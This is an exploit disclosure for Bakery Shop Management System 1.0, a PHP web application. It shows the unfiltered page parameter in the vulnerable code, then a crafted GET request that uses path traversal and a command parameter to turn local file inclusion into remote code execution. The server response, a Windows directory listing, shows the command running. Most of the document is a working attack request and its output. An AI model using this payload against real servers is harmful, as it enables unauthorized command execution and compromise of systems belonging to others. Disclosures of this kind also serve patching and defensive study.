# Title:  Bakery Shop Management System 1.0  LFI To RCE
# Author: Hejap Zairy
# Date: 06.04.2022
# Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/
# Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache




#vulnerability Code  php
Needs more filtering require_once

```
require_once('DBConnection.php');
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if($_SESSION['type'] != 1 && in_array($page,array('maintenance','products','stocks'))){
    header("Location:./");
    exit;
}
```

[+] Payload GET


```
GET //bsms/?page=../../../0day&515=dir HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s
Upgrade-Insecure-Requests: 1
```


#Status: CRITICAL

#Response 
```
    <div class="container py-3" id="page-container">

                 Volume in drive C is OS
 Volume Serial Number is 2EF1-9DCA

 Directory of C:\xampp\htdocs\bsms

04/06/2022  04:18 AM    <DIR>          .
04/06/2022  05:05 AM    <DIR>          ..
02/14/2022  10:39 AM            16,358 Actions.php
08/04/2021  11:04 PM    <DIR>          css
02/14/2022  11:55 AM    <DIR>          database
09/09/2021  11:54 AM    <DIR>          DataTables
02/14/2022  11:55 AM               865 DBConnection.php
08/05/2021  03:09 AM    <DIR>          Font-Awesome-master
02/14/2022  12:00 PM            10,407 home.php
02/14/2022  11:07 AM    <DIR>          images
02/14/2022  02:26 PM            10,018 index.php
09/11/2021  11:40 AM    <DIR>          js
02/14/2022  11:11 AM             4,372 login.php

```



# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce


# Proof and Exploit:
https://i.imgur.com/qLNHh9Q.png
https://i.imgur.com/XDSsyNL.jpg